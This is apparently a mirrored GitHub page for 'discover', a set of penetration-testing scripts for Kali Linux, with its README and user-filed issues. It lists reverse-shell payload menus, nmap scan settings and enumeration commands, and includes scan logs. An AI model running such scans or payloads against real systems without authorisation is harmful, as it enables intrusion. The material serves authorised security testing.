Giter Site home page Giter Site logo

leebaird / discover Goto Github PK

View Code? Open in Web Editor NEW
3.3K 202.0 810.0 3.38 MB

Custom bash scripts used to automate various penetration testing tasks including recon, scanning, enumeration, and malicious payload creation using Metasploit. For use with Kali Linux.

License: MIT License

Shell 20.34% Python 6.22% CSS 6.10% HTML 12.30% PowerShell 54.81% HCL 0.18% Vim Script 0.05%
red-team bash nmap metasploit scanning osint recon kali-linux payload-generator reconnaissance

discover's Introduction

Custom bash scripts used to automate various penetration testing tasks including recon, scanning, 
enumeration, and malicious payload creation using Metasploit. For use with Kali Linux.

License: MIT Rawsec's CyberSecurity Inventory

  • Twitter Follow Lee Baird @discoverscripts
  • Twitter Follow Jay "L1ghtn1ng" Townsend @jay_townsend1
  • Twitter Follow Jason Ashton @ninewires

Download, setup, and usage

  • git clone https://github.com/leebaird/discover /opt/discover/
  • Discover should be ran as root from this location.
  • cd /opt/discover/
  • sudo ./discover.sh
  • Select option 15 to update Kali Linux, Discover scripts, various tools, and the locate database before using the framework.
RECON
1.  Domain
2.  Person

SCANNING
3.  Generate target list
4.  CIDR
5.  List
6.  IP, range, or URL
7.  Rerun Nmap scripts and MSF aux

WEB
8.  Insecure direct object reference
9.  Open multiple tabs in Firefox
10. Nikto
11. SSL

MISC
12. Parse XML
13. Generate a malicious payload
14. Start a Metasploit listener
15. Update
16. Exit

RECON

Domain

RECON

1.  Passive
2.  Active
3.  Find registered domains
4.  Previous menu

Passive uses ARIN, DNSRecon, dnstwist, goog-mail, goohost, theHarvester, Metasploit, Whois, multiple websites, and recon-ng.

Active uses DNSRecon, recon-ng, Traceroute, wafw00f, and Whatweb.

Acquire API keys for maximum results with theHarvester.

  • Add keys to /etc/theHarvester/api-keys.yaml

Person

RECON

First name:
Last name:
  • Combines info from multiple websites.

SCANNING

Generate target list

SCANNING

1.  ARP scan
2.  Ping sweep
3.  Previous menu
  • Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover, and nmap pingsweep.

CIDR, List, IP, Range, or URL

Type of scan:

1.  External
2.  Internal
3.  Previous menu
  • External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.
  • Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
  • Nmap is used to perform host discovery, port scanning, service enumeration, and OS identification.
  • Nmap scripts and Metasploit auxiliary modules are used for additional enumeration.
  • Addition tools: enum4linux, smbclient, and ike-scan.

WEB

Insecure direct object reference

Using Burp, authenticate to a site, map & Spider, then log out.
Target > Site map > select the URL > right click > Copy URLs in
this host. Paste the results into a new file.

Enter the location of your file:

Open multiple tabs in Firefox

Open multiple tabs in Firefox with:

1.  List
2.  Files in a directory
3.  Directories in robots.txt
4.  Previous menu

Examples:

  • A list containing multiple IPs and/or URLs.
  • You finished scanning multiple web sites with Nikto and want to open every htm report located in a directory.
  • Use wget to download a domain's robot.txt file, then open all of the directories.

Nikto

This option cannot be ran as root.

Run multiple instances of Nikto in parallel.

1.  List of IPs
2.  List of IP:port
3.  Previous menu

SSL

Check for SSL certificate issues.

List of IP:port.


Enter the location of your file:
  • Uses sslscan, sslyze, and nmap to check for SSL/TLS certificate issues.

MISC

Parse XML

Parse XML to CSV.

1.  Burp (Base64)
2.  Nessus (.nessus)
3.  Nexpose (XML 2.0)
4.  Nmap
5.  Qualys
6.  Previous menu

Generate a malicious payload

Malicious Payloads

1.   android/meterpreter/reverse_tcp         (.apk)
2.   cmd/windows/reverse_powershell          (.bat)
3.   java/jsp_shell_reverse_tcp (Linux)      (.jsp)
4.   java/jsp_shell_reverse_tcp (Windows)    (.jsp)
5.   java/shell_reverse_tcp                  (.war)
6.   linux/x64/meterpreter_reverse_https     (.elf)
7.   linux/x64/meterpreter_reverse_tcp       (.elf)
8.   linux/x64/shell/reverse_tcp             (.elf)
9.   osx/x64/meterpreter_reverse_https       (.macho)
10.  osx/x64/meterpreter_reverse_tcp         (.macho)
11.  php/meterpreter_reverse_tcp             (.php)
12.  python/meterpreter_reverse_https        (.py)
13.  python/meterpreter_reverse_tcp          (.py)
14.  windows/x64/meterpreter_reverse_https   (multi)
15.  windows/x64/meterpreter_reverse_tcp     (multi)
16.  Previous menu

Start a Metasploit listener

Metasploit Listeners

1.   android/meterpreter/reverse_tcp
2.   cmd/windows/reverse_powershell
3.   java/jsp_shell_reverse_tcp
4.   linux/x64/meterpreter_reverse_https
5.   linux/x64/meterpreter_reverse_tcp
6.   linux/x64/shell/reverse_tcp
7.   osx/x64/meterpreter_reverse_https
8.   osx/x64/meterpreter_reverse_tcp
9.   php/meterpreter/reverse_tcp
10.  python/meterpreter_reverse_https
11.  python/meterpreter_reverse_tcp
12.  windows/x64/meterpreter_reverse_https
13.  windows/x64/meterpreter_reverse_tcp
14.  Previous menu

Update

  • Update Kali Linux, Discover scripts, various tools, and the locate database.

Troubleshooting

Some users have reported being unable to use any options except for 3, 4, and 5. Nothing happens when choosing other options (1, 2, 6, etc.).

Always run Discover as root

cd /opt/discover/
sudo ./discover.sh

Verify the download hash

Hash-based verification ensures that a file has not been corrupted by comparing the file's hash value to a previously calculated value. If these values match, the file is presumed to be unmodified.

macOS

  1. Open Terminal
  2. shasum -a 256 /path/to/file
  3. Compare the value to the checksum on the website.

Windows

  1. Open PowerShell
  2. Get-FileHash C:\path\to\file
  3. Compare the value to the checksum on the website.

Running Kali on VirtualBox or Windows Subsystem for Linux (WSL)

Some users have reported the fix is to use the VMWare image instead of WSL. (https://kali.download/virtual-images/kali-2022.3/kali-linux-2022.3-vmware-amd64.7z.torrent)

Other users have noticed issues when running a pre-made VirtualBox Kali image, instead of running the bare metal Kali ISO through VirtualBox. (https://www.kali.org/get-kali/#kali-bare-metal)

If you are unwilling or unable to use VMWare Workstation to run Kali, we encourage you to try running a Kali ISO as a Guest VM in VirtualBox.

  1. Download the bare metal ISO provided by Kali.
  2. Verify the ISO hash (see above).
  3. Start a new Kali VM within VirtualBox with the bare metal Kali ISO.

There will be some basic installation instructions you will be required to fill out during the installation.

Note: If you have problems accessing root after setting up a bare metal ISO, please refer to: https://linuxconfig.org/how-to-reset-kali-linux-root-password

discover's People

Contributors

aestone24 avatar arthurakay avatar cmd-space avatar insaneminer avatar joacole avatar l1ghtn1ng avatar leebaird avatar michael-hart-github avatar ninewires avatar noraj avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

discover's Issues

(Suggestion) f_metasploit() as a seperate option

I ran a scan but my net dropped out when I went to run the metasploit auxiliaries at the end of the script. The only option I see would be to rerun the entire scan to get back to this option.

Would be great to be able to have the f_metasploit() as an option on the folder where the report and support docs are dropped.

More tools to consider.

httpscreenshot or EyeWitness

snmpwalk -c public -v1 targetIP
snmpcheck -c public -t targetIP
snmpenum -t targetIP

tnscmd10g version -h targetIP
tnscmd10g status -h targetIP

iDRAC MSF or Hydra

crackmapexec
smbclient
smbmap

License missing

Could you please add whatever license you like?

Your code is technically undistributable without a license in most countries. I browsed through the repo and couldn't find one. If there is one could you please point it out?

Thanks

theharvester stop searching when he switched to Baidu

Hi lee,

i love this tool, but I have a problem with theHarvester, when he starts looking through Baidu, so he stops and does not continue beyond. When I pause the search and run again passive gathering, so sometimes happens that suddenly come through normally. viz screen shot below.
Please do not know what it could be?

Thanks a lot.

screenshot from 2017-02-02 10-58-23

adding option for no ping during port scan

`f_scan(){
custom='1-1040,1050,1080,1099,1125,1158,1194,1214,1220,1344,1352,1433,1500,1503,1521,1524,1526,1720,1723,1731,1812,1813,1953,1959,2000,2002,2030,2049,2100,2121,2200,2202,2222,2301,2375,2381,2401,2433,2456,2500,2556,2628,2745,2780-2783,2947,3000,3001,3031,3121,3127,3128,3200,3201,3230-3235,3260,3268,3269,3306,3310, 3339,3389,3460,3500,3527,3632,3689,4000,4045,4100,4242,4369,4430,4443,4445,4661,4662,4711,4848,5000,5001,5009,5010,5019,5038,5040,5059,5060,5061,5101,5180,5190,5191,5192,5193,5250,5432,5554,5555,5560,5566,5631,5666,5672,5678,5800,5801,5802,5803,5804,5850,5900-6009,6101,6106,6112,6161,6346,6379,6588,6666,6667,6697,6777,7000,7001,7002,7070,7100,7210,7510,7634,7777,7778,8000,8001,8004,8005,8008,8009,8080,8081,8082,8083,8091,8098,8099,8100,8180,8181,8222,8332,8333,8383,8384,8400,8443,8444,8470-8480,8500,8787,8834,8866,8888,9090,9100,9101,9102,9160,9343,9470-9476,9480,9495,9996,9999,10000,10025,10168,11211,12000,12345,12346,13659,15000,16080,18181-18185,18207,18208,18231,18232,19150,19190,19191,20034,22226,27017,27374,27665,28784,30718,31337,32764,32768,32771,33333,35871,37172,38903,39991,39992,40096,46144,46824,49400,50000,50030,50060,50070,50075,50090,51080,51443,53050,54320,58847,60000,60010,60030,60148,60365,62078,63148'
full='1-65535'
udp='53,67,123,137,161,500,523,1434,1604,2302,3478,3671,4070,5353,6481,17185,31337,44818,47808'
yesping='-sP -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,49152'
noping='-Pn'

echo
echo -n "Perform ping scan? (y/N) "
read discping

if [ "$discping" == "y" ]; then
pingscans=$yesping
else
pingscans=$noping
fi

echo
echo -n "Perform full TCP port scan? (y/N) "
read scan

if [ "$scan" == "y" ]; then
tcp=$full
else
tcp=$custom
fi

echo
echo -n "Perform version detection? (y/N) "
read vdetection

if [ "$vdetection" == "y" ]; then
S='sSV'
U='sUV'
else
S='sS'
U='sU'
fi

echo
echo -n "Set scan delay. (0-5, enter for normal) "
read delay

Check for no answer

if [[ -z $delay ]]; then
delay='0'
fi

if [ $delay -lt 0 ] || [ $delay -gt 5 ]; then
f_error
fi

echo
echo $medium

nmap -iL $location --excludefile $excludefile -n -$S -$U $pingscans -p T:$tcp,U:$udp --max-retries 3 --min-rtt-timeout 100ms --max-rtt-timeout $maxrtt --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -g $sourceport --scan-delay $delay -oA $name/nmap

x=$(grep '(0 hosts up)' $name/nmap.nmap)

if [[ -n $x ]]; then
rm -rf "$name" tmp
echo
echo $medium
echo
echo "_Scan complete._"
echo
echo
echo -e "\x1B[1;33m[*] No live hosts were found.\x1B[0m"
echo
echo
exit
fi

Clean up

egrep -v '(0000:|0010:|0020:|0030:|0040:|0050:|0060:|0070:|0080:|0090:|00a0:|00b0:|00c0:|00d0:|1 hop|closed|guesses|GUESSING|filtered|fingerprint|FINGERPRINT|general purpose|initiated|latency|Network Distance|No exact OS|No OS matches|OS:|OS CPE|Please report|RTTVAR|scanned in|SF|unreachable|Warning|WARNING)' $name/nmap.nmap | sed 's/Nmap scan report for //' | sed '/^$/! b end; n; /^$/d; : end' > $name/nmap.txt

grep -o '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' $name/nmap.nmap | $sip > $name/hosts.txt
hosts=$(wc -l $name/hosts.txt | cut -d ' ' -f1)

grep 'open' $name/nmap.txt | grep -v 'WARNING' | awk '{print $1}' | sort -un > $name/ports.txt
grep 'tcp' $name/ports.txt | cut -d '/' -f1 > $name/ports-tcp.txt
grep 'udp' $name/ports.txt | cut -d '/' -f1 > $name/ports-udp.txt

grep 'open' $name/nmap.txt | grep -v 'really open' | awk '{for (i=4;i<=NF;i++) {printf "%s%s",sep, $i;sep=" "}; printf "\n"}' | sed 's/^ //' | sort -u | sed '/^$/d' > $name/banners.txt

for i in $(cat $name/ports-tcp.txt); do
TCPPORT=$i
cat $name/nmap.gnmap | grep " $i/open/tcp//http/| $i/open/tcp//http-alt/| $i/open/tcp//http-proxy/| $i/open/tcp//appserv-http/" |
sed -e 's/Host: //g' -e 's/ (.//g' -e 's.^.http://.g' -e "s/$/:$i/g" | $sip >> tmp
cat $name/nmap.gnmap | grep " $i/open/tcp//https/| $i/open/tcp//https-alt/| $i/open/tcp//ssl|giop/| $i/open/tcp//ssl|http/| $i/open/tcp//ssl|unknown/" |
sed -e 's/Host: //g' -e 's/ (.
//g' -e 's.^.https://.g' -e "s/$/:$i/g" | $sip >> tmp2
done

sed 's/http:////g' tmp > $name/http.txt
sed 's/https:////g' tmp2 > $name/https.txt

Remove all empty files

find $name/ -type f -empty -exec rm {} +
}`

Remove 123people.com as it has been discontinued

Via: Recon -> Person

123people.com appears to be discontinued.

"Sorry, this service is no longer available.
After six exciting and prosperous years of people search we have taken this service permanently offline and are focusing on other projects.
A big thank you to all our users, partners and followers!
The 123people Team"

theHarverster issues

This is to consolidate all theHarverster issues that have been identified and one place to track them

- #87

./discover.sh: line 312: /usr/bin/theHarvester: Permission denied
     Bing                 (10/33)
./discover.sh: line 314: /usr/bin/theHarvester: Permission denied
     Dogpilesearch        (11/33)
./discover.sh: line 316: /usr/bin/theHarvester: Permission denied
     Google               (12/33)
./discover.sh: line 318: /usr/bin/theHarvester: Permission denied
     Google CSE           (13/33)
./discover.sh: line 320: /usr/bin/theHarvester: Permission denied
     Google+              (14/33)
./discover.sh: line 322: /usr/bin/theHarvester: Permission denied
     Google Profiles      (15/33)
./discover.sh: line 324: /usr/bin/theHarvester: Permission denied
     Jigsaw               (16/33)
./discover.sh: line 326: /usr/bin/theHarvester: Permission denied
     LinkedIn             (17/33)
./discover.sh: line 328: /usr/bin/theHarvester: Permission denied
     PGP                  (18/33)
./discover.sh: line 330: /usr/bin/theHarvester: Permission denied
     Yahoo                (19/33)
./discover.sh: line 332: /usr/bin/theHarvester: Permission denied
     All                  (20/33)
./discover.sh: line 334: /usr/bin/theHarvester: Permission denied

Is due to not having 700 file permissions. This was identified on a test VM with a clean install of kali

Kali are patching the file with this which is why we are running in to issue 87

 --- a/theHarvester.py
 +++ b/theHarvester.py
   @@ -7,6 +7,7 @@ import os
   from socket import *
   import re
   import getopt
  +sys.path.append("/usr/share/theharvester/")

 try:
    import requests

Script is not creating folders

Hello,

Running into an issue running this on Kali 2.x

Here's an example:

Choice: 1

Usage

Company: Target
Domain: target.com

Company: Walmart
Domain: walmart.com
cp: target ‘/root/data/walmart.com’ is not a directory
sed: can't read /root/data/walmart.com/index.htm: No such file or directory
mv: cannot move ‘tmp’ to ‘/root/data/walmart.com/index.htm’: No such file or directory

dnsrecon (1/26)

goofile (2/26)

goog-mail (3/26)
./discover.sh: line 210: /opt/discover: Is a directory

goohost
IP (4/26)
./discover.sh: line 222: /opt/discover: Is a directory
Email (5/26)
./discover.sh: line 224: /opt/discover: Is a directory
cat: report-: No such file or directory
rm: cannot remove ‘
-walmart.com.txt’: No such file or directory

theHarvester
Baidu (6/26)
Bing (7/26)

Please advise how to fix this.

Thanks

Domain Scan

Passive scan not working, no file found
COMPANY = Company
DOMAIN = Domain.com
saves as www.domain.com instead of domain.com where is saves files, can't locate saves on /root/data/... nothing.

Parse SalesForce

Do I export the csv file and list it down here?

Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.

Enter the location of your file:

What is the parser suppose to do?

Report doesn't show all ports properly.

The port 10000 (webmin) and port 111 is shown through the initial scan as being open within the nmap output. In the report it makes no mention of this port in the nmap report list. It does provide additional details towards the bottom, but when glancing at a report I would expect it to be in the output towards the top of the report like it is in the output while running the script. Unsure if this is by design.

| \ | |____ | | | \ / |_____ |____/
|/ | | | || / |_____ | _

By Lee Baird

Type of scan:

  1. External
  2. Internal
  3. Previous menu

Choice: 1

[*] Setting source port to 53 and the max probe round trip time to 1.5s.

Name of scan: 192.168.xx.xx

IP, Range or URL: 192.168.xx.xx

Perform full TCP port scan? (y/N) y

Perform version detection? (y/N) y

Set scan delay. (0-5, enter for normal)

Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-24 01:41 CDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.47% done; ETC: 01:42 (0:00:34 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 61.68% done; ETC: 01:41 (0:00:12 remaining)
Stats: 0:00:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 7.69% done; ETC: 01:43 (0:01:00 remaining)
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 30.77% done; ETC: 01:42 (0:00:34 remaining)
Stats: 0:00:51 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 30.77% done; ETC: 01:43 (0:00:50 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 30.77% done; ETC: 01:43 (0:01:12 remaining)
Stats: 0:01:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 30.77% done; ETC: 01:44 (0:01:37 remaining)
Stats: 0:01:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 53.85% done; ETC: 01:43 (0:00:45 remaining)
Stats: 0:01:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 72.00% done; ETC: 01:42 (0:00:01 remaining)
Stats: 0:01:40 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 76.00% done; ETC: 01:43 (0:00:04 remaining)
Stats: 0:01:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 76.00% done; ETC: 01:43 (0:00:07 remaining)
Nmap scan report for 192.168.xx.xx
Host is up (0.080s latency).
Not shown: 65521 closed ports, 16 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.0 (protocol 2.0)
111/tcp open rpcbind 2 (RPC #100000)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
32769/tcp open status 1 (RPC #100024)
67/udp open|filtered dhcps
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
500/udp open|filtered isakmp
523/udp open|filtered ibm-db2
1434/udp open|filtered ms-sql-m
2302/udp open|filtered binderysupport
6481/udp open|filtered unknown
17185/udp open|filtered wdbrpc
MAC Address: 00:50:56:AF:66:B7 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.70 seconds

Locating high value ports.
TCP
UDP

Running nmap scripts.
SSH
NFS
Network Data Management

Run matching Metasploit auxiliaries? (y/N) y

Starting Postgres.
[ ok ] Starting PostgreSQL 9.1 database server: main.

Starting Metasploit, this takes about 45 sec.

Using the following resource files.
SSH
NFS
[*] Starting the Metasploit Framework console...|

             _---------.
         .' #######   ;."

.---,. ;@ @@; .---,.. ." @@@@@'.,'@@ @@@@@',.'@@@@ ". '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; .@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ . ;' |@@@@ @@@ @ . ' @@@ @@ @@ , .@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit!
;@'. *****,." |--- _____________/
'(.,...."/

Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit

   =[ metasploit v4.11.2-2015051401 [core:4.11.2.pre.2015051401 api:1.0.0]]
  • -- --=[ 1463 exploits - 918 auxiliary - 243 post ]
  • -- --=[ 376 payloads - 37 encoders - 8 nops ]
  • -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[] Processing /opt/discover/192.168.xx.xx/master.rc for ERB directives.
resource (/opt/discover/192.168.xx.xx/master.rc)> workspace -a 192.168.xx.xx
[
] Added workspace: 192.168.xx.xx
resource (/opt/discover/192.168.xx.xx/master.rc)> setg RHOSTS file:/opt/discover/192.168.xx.xx/22.txt
RHOSTS => file:/opt/discover/192.168.xx.xx/22.txt
resource (/opt/discover/192.168.xx.xx/master.rc)> setg THREADS 255
THREADS => 255
resource (/opt/discover/192.168.xx.xx/master.rc)> setg RPORT 22
RPORT => 22
resource (/opt/discover/192.168.xx.xx/master.rc)> use auxiliary/scanner/ssh/ssh_version
resource (/opt/discover/192.168.xx.xx/master.rc)> run
[] 192.168.xx.xx:22, SSH server version: SSH-2.0-OpenSSH_4.0
[
] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (/opt/discover/192.168.xx.xx/master.rc)> setg RHOSTS file:/opt/discover/192.168.xx.xx/111.txt
RHOSTS => file:/opt/discover/192.168.xx.xx/111.txt
resource (/opt/discover/192.168.xx.xx/master.rc)> setg THREADS 255
THREADS => 255
resource (/opt/discover/192.168.xx.xx/master.rc)> setg RPORT 111
RPORT => 111
resource (/opt/discover/192.168.xx.xx/master.rc)> use auxiliary/scanner/misc/sunrpc_portmapper
resource (/opt/discover/192.168.xx.xx/master.rc)> run

[+] SunRPC Programs for 192.168.xx.xx

Name Number Version Port Protocol


rpcbind 100000 2 111 tcp
rpcbind 100000 2 111 udp
status 100024 1 32769 udp
status 100024 1 32769 tcp

[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed
resource (/opt/discover/192.168.xx.xx/master.rc)> use auxiliary/scanner/nfs/nfsmount
resource (/opt/discover/192.168.xx.xx/master.rc)> run
[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed
resource (/opt/discover/192.168.xx.xx/master.rc)> db_export -f xml -a 192.168.xx.xx/metasploit.xml
[] Starting export of workspace 192.168.xx.xx to 192.168.xx.xx/metasploit.xml [ xml ]...
[
] >> Starting export of report
[] >> Starting export of hosts
[
] >> Starting export of events
[] >> Starting export of services
[
] >> Starting export of web sites
[] >> Starting export of web pages
[
] >> Starting export of web forms
[] >> Starting export of web vulns
[
] >> Starting export of module details
[] >> Finished export of report
[
] Finished export of workspace 192.168.xx.xx to 192.168.xx.xx/metasploit.xml [ xml ]...
resource (/opt/discover/192.168.xx.xx/master.rc)> db_import 192.168.xx.xx/nmap.xml
[] Importing 'Nmap XML' data
[
] Import: Parsing with 'Nokogiri v1.6.6.2'
[] Importing host 192.168.xx.xx
[
] Successfully imported /opt/discover/192.168.xx.xx/nmap.xml
resource (/opt/discover/192.168.xx.xx/master.rc)> exit

_Scan complete._

The new report is located at /root/data/192.168.xx.xx/report.txt

root@ninja:/opt/discover# cat /root/data/192.168.xx.xx/report.txt
Nmap Report
Sunday - May 24, 2015

Start time 01:41:22 AM CDT
Finish time 01:44:22 AM CDT
Scanner IP 10.0.0.xx
192.168.xx.72

1 host discovered.

192.168.xx.xx
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.0 (protocol 2.0)
32769/tcp open status 1 (RPC #100024)
MAC Address: 00:50:56:AF:66:B7 (VMware)

Nmap Scripts

192.168.xx.xx
PORT STATE SERVICE
22/tcp open ssh
| ssh2-enum-algos:
| kex_algorithms: (3)
| diffie-hellman-group-exchange-sha1
| diffie-hellman-group14-sha1
| diffie-hellman-group1-sha1
| server_host_key_algorithms: (2)
| ssh-rsa
| ssh-dss
| encryption_algorithms: (11)
| aes128-cbc
| 3des-cbc
| blowfish-cbc
| cast128-cbc
| arcfour
| aes192-cbc
| aes256-cbc
| [email protected]
| aes128-ctr
| aes192-ctr
| aes256-ctr
| mac_algorithms: (6)
| hmac-md5
| hmac-sha1
| hmac-ripemd160
| [email protected]
| hmac-sha1-96
| hmac-md5-96
| compression_algorithms: (2)
|_ zlib

192.168.xx.xx
PORT STATE SERVICE
111/tcp open rpcbind
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32769/tcp status
|_ 100024 1 32769/udp status

192.168.xx.xx
PORT STATE SERVICE
10000/tcp open snet-sensor-mgmt
| ndmp-fs-info:
| ndmp-version:

root@ninja:/opt/discover#

Recon > Person

After the last tab open, about 5 seconds later the Terminal opens with a huge stack trace.

Hit and you are promoted with an "Invalid choice...." error message.
Iceweasel has not crashed.

Strange output after urlvoid.com

dnssy.com (25/29)
email-format.com (26/29)
ewhois.com (27/29)
myipneighbors.net (28/29)
urlvoid.com (29/29)
QFont::setPixelSize: Pixel size <= 0 (0)
QFont::setPixelSize: Pixel size <= 0 (0)

_Scan complete._

URLCrazy errors

URLCrazy (20/26)
/usr/share/urlcrazy/tld.rb:81: warning: key "2nd_level_registration" is duplicated and overwritten on line 81
/usr/share/urlcrazy/tld.rb:89: warning: key "2nd_level_registration" is duplicated and overwritten on line 89
/usr/share/urlcrazy/tld.rb:91: warning: key "2nd_level_registration" is duplicated and overwritten on line 91

ARIN - POCs

After returning a list of POCs for a domain, open every page and scrape contact name and email.

Glib Error

Getting a ton of errors on a new Kali 2.0 install.

  • Did GIT pull
  • Did update.sh
  • Ran the Recon -> Domain -> Passive (#1, #1)
  • The scan completes but many files are missing from the report web page like Netcraft and config etc..

Scan starts fine then gets to the below:


Press to continue.

(process:36574): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed
console.error:
[CustomizableUI]
Custom widget with id loop-button does not return a valid node
console.error:
[CustomizableUI]
Custom widget with id loop-button does not return a valid node

(process:36613): GLib-CRITICAL *: g_slice_set_config: assertion 'sys_page_size == 0' failed
...
...
...
(process:37494): GLib-CRITICAL *
: g_slice_set_config: assertion 'sys_page_size == 0' failed
(process:37499): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed

Add recon-ng

Use invisible option 98 from the main menu to test.

Use invisible option 97 from the main menu to generate files:
creds.txt
emails.txt
hosts.txt
names.txt
subdomains.txt

Netcraft

Screenshot and scrape text from screen.

Download link needs to be updated

Current Download:
•git clone git://github.com/leebaird/backtrack-scripts.git /opt/scripts/

Suggested Download:
•git clone git://github.com/leebaird/discover.git /opt/scripts/

unable to update

unable to update, well stuck on "sudo apt-get install -y gnumeric" connection fail tried installing separately and tried "sudo apt-get install libgtk-3-dev zlibc zlib1g zlib1g-dev intltool" but gets stuck on verification.

update.sh fixes?

Looks like bluepot needs to be updated to github and exploit-db and fern wifi cracker and joomscan need to be updated in the update.sh to validate install and update with the correct if ... else ... fi statement.

  • Travis

Import Error for theHarvester

Hey Lee,

Great tool, I've loved the functionality and recently updated to the latest version. After the update I get a few errors that appear to be an order of operations thing.

error:
Traceback (most recent call last): File "/usr/bin/theHarvester", line 17, in <module> from discovery import *

I'm working through some other things and will post them here if I can't figure them out. Thanks again for such a great tool.

SG

Automated version \ script?

Hi!
I would like to have an automated version of the discover tool - active and passive recon, nikto on the hosts with screenshots, inside the complete report generated.
Is it possible?
Thanks a lot!
Dvir

Error

Hi, after running a passive domain scan, i receive the following error:

cat: names-tmp: No such file or directory
./discover.sh: line 636: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/hosts.htm: No such file or directory
./discover.sh: line 636: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/hosts.htm: No such file or directory
./discover.sh: line 652: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/emails.htm: No such file or directory
./discover.sh: line 662: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/names.htm: No such file or directory
./discover.sh: line 700: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/subdomains.htm: No such file or directory
./discover.sh: line 759: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/whois-domain.htm: No such file or directory
./discover.sh: line 759: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/whois-domain.htm: No such file or directory
./discover.sh: line 766: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/whois-ip.htm: No such file or directory
./discover.sh: line 766: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/whois-ip.htm: No such file or directory
./discover.sh: line 769: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/names.htm: No such file or directory
./discover.sh: line 770: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/squatting.htm: No such file or directory
./discover.sh: line 771: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/subdomains.htm: No such file or directory
